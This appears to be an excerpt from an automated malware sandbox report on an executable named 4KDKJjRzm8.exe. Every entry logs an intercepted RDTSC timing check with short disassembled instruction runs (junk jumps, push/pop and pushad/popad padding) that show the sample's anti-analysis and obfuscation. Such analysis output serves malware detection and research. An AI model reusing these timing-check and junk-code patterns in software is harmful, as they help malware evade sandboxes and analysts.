                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEE3DE second address: BEE3E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEE3E2 second address: BEE3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEC662 second address: BEC673 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007FB3DD280BB6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEC673 second address: BEC677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF12 second address: BECF25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB3DD280BB6h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007FB3DD280BB6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF25 second address: BECF29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF29 second address: BECF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF35 second address: BECF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BECF3A second address: BECF3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED24E second address: BED252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED545 second address: BED54B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED54B second address: BED550 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED550 second address: BED571 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007FB3DD280BC3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED571 second address: BED58C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FB3DD3D95E6h 0x0000000a popad 0x0000000b js 00007FB3DD3D95F0h 0x00000011 jmp 00007FB3DD3D95EAh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED58C second address: BED592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED8B2 second address: BED8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED8B8 second address: BED8D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB3DD280BC4h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BED8D5 second address: BED8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BEDB81 second address: BEDB8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FB3DD280BB6h 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF2F4C second address: BF2F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF2F54 second address: BF2F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007FB3DD280BB6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF20BF second address: BF20C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF20C6 second address: BF20CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF20CB second address: BF20D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB3DD3D95E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF20D7 second address: BF20E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FB3DD280BB6h 0x0000000a popad 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF23B5 second address: BF23B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF23B9 second address: BF241D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FB3DD280BC6h 0x0000000c jmp 00007FB3DD280BC6h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 jmp 00007FB3DD280BBFh 0x0000001a jnl 00007FB3DD280BB6h 0x00000020 jmp 00007FB3DD280BC0h 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 pushad 0x00000029 pushad 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BF2B47 second address: BF2B50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFE45E second address: BFE462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFE5CC second address: BFE5E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95EDh 0x00000009 jno 00007FB3DD3D95E6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFE882 second address: BFE88B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFE88B second address: BFE89D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95EEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFECD5 second address: BFECFB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FB3DD280BBCh 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB3DD280BC1h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFECFB second address: BFED12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95F3h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFF3AD second address: BFF3B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFF3B1 second address: BFF3CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB3DD3D95F4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: BFF3CB second address: BFF3D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4798F second address: B47993 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B47993 second address: B4799D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B4799D second address: B479A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: B479A1 second address: B479B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jns 00007FB3DD280BB6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C078A8 second address: C078B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FB3DD3D95E6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C078B4 second address: C078C0 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C078C0 second address: C078C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C140A1 second address: C140AC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007FB3DD280BB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C140AC second address: C140B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194AC second address: C194C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194C9 second address: C194CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194CF second address: C194D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194D7 second address: C194E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FB3DD3D95E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C194E3 second address: C194E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C233D3 second address: C233D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C233D8 second address: C233E2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB3DD280BBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C2D015 second address: C2D019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C2D019 second address: C2D021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C2CEC0 second address: C2CEC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33947 second address: C33985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jnl 00007FB3DD280BB6h 0x0000000c jnp 00007FB3DD280BB6h 0x00000012 jmp 00007FB3DD280BC0h 0x00000017 popad 0x00000018 push eax 0x00000019 push esi 0x0000001a pop esi 0x0000001b pop eax 0x0000001c popad 0x0000001d pushad 0x0000001e jmp 00007FB3DD280BBDh 0x00000023 push eax 0x00000024 push edx 0x00000025 jno 00007FB3DD280BB6h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33985 second address: C33995 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FB3DD3D95E6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33AD5 second address: C33AED instructions: 0x00000000 rdtsc 0x00000002 je 00007FB3DD280BBCh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jl 00007FB3DD280BB6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33C6D second address: C33C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB3DD3D95E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33DFA second address: C33E00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C33E00 second address: C33E06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C343E3 second address: C343ED instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB3DD280BB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C388BB second address: C388C1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C38A25 second address: C38A29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C38A29 second address: C38A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C38A2F second address: C38A40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FB3DD280BB6h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C40EE9 second address: C40EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C55244 second address: C55254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jo 00007FB3DD280BB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C55254 second address: C5525E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FB3DD3D95E6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C5525E second address: C55271 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BBCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C55271 second address: C55279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: C54D84 second address: C54DB9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB3DD280BB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pop esi 0x0000000d jne 00007FB3DD280BB6h 0x00000013 pop eax 0x00000014 popad 0x00000015 pushad 0x00000016 push ecx 0x00000017 jmp 00007FB3DD280BC8h 0x0000001c push eax 0x0000001d pop eax 0x0000001e pop ecx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E01C0 second address: 52E01FD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB3DD280BBBh 0x00000008 jmp 00007FB3DD280BC3h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 leave 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB3DD280BC5h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E01FD second address: 52E0203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0203 second address: 52E0207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0B5E second address: 52E0B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0B62 second address: 52E0B7F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0B7F second address: 52E0BC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB3DD3D95EEh 0x0000000f push eax 0x00000010 jmp 00007FB3DD3D95EBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB3DD3D95F5h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0BC7 second address: 52E0BED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD280BC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB3DD280BBDh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0D82 second address: 52E0D9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52E0D9F second address: 52E0DA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F09C4 second address: 52F09CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F09CA second address: 52F09CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F09CE second address: 52F0A49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a jmp 00007FB3DD3D95EAh 0x0000000f pushfd 0x00000010 jmp 00007FB3DD3D95F2h 0x00000015 jmp 00007FB3DD3D95F5h 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f jmp 00007FB3DD3D95EEh 0x00000024 mov ebp, esp 0x00000026 jmp 00007FB3DD3D95F0h 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007FB3DD3D95F7h 0x00000033 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A49 second address: 52F0A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 58h 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FB3DD280BBCh 0x0000000e xchg eax, esi 0x0000000f jmp 00007FB3DD280BC0h 0x00000014 mov esi, dword ptr [ebp+0Ch] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FB3DD280BBAh 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A80 second address: 52F0A84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A84 second address: 52F0A8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A8A second address: 52F0A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB3DD3D95EDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0A9B second address: 52F0AAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop edi 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0AAD second address: 52F0B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB3DD3D95F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FB44D4C6EDBh 0x0000000f pushad 0x00000010 pushad 0x00000011 movzx esi, bx 0x00000014 jmp 00007FB3DD3D95EFh 0x00000019 popad 0x0000001a mov si, FB5Fh 0x0000001e popad 0x0000001f cmp dword ptr [7544459Ch], 05h 0x00000026 jmp 00007FB3DD3D95F2h 0x0000002b je 00007FB44D4DEF82h 0x00000031 jmp 00007FB3DD3D95F0h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a mov dl, 95h 0x0000003c mov ebx, eax 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\4KDKJjRzm8.exeRDTSC instruction interceptor: First address: 52F0BBB second address: 52F0BBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
